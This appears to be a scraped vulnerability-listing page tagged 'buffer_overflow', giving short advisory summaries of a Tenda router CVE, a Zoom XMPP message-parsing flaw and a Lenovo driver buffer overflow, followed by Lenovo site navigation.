*   Or use strncpy() instead of strcpy()

CVE-2022-30033: Vulnerability/Tenda-TX9-V22.03.02.10-19042022-2.md at main · H4niz/Vulnerability

The Zoom Client for Meetings (for Android, iOS, Linux, MacOS, and Windows) before version 5.10.0 failed to properly parse XML stanzas in XMPP messages. This can allow a malicious user to break out of the current XMPP message context and create a new message context to have the receiving users client perform a variety of actions.This issue could be used in a more sophisticated attack to forge XMPP messages from the server.

CVE-2022-22784: Security Bulletin

A buffer overflow vulnerability in Lenovo Smart Standby Driver prior to version 4.1.50.0 could allow a local attacker to cause denial of service.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Sales Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | |

Tag

#buffer_overflow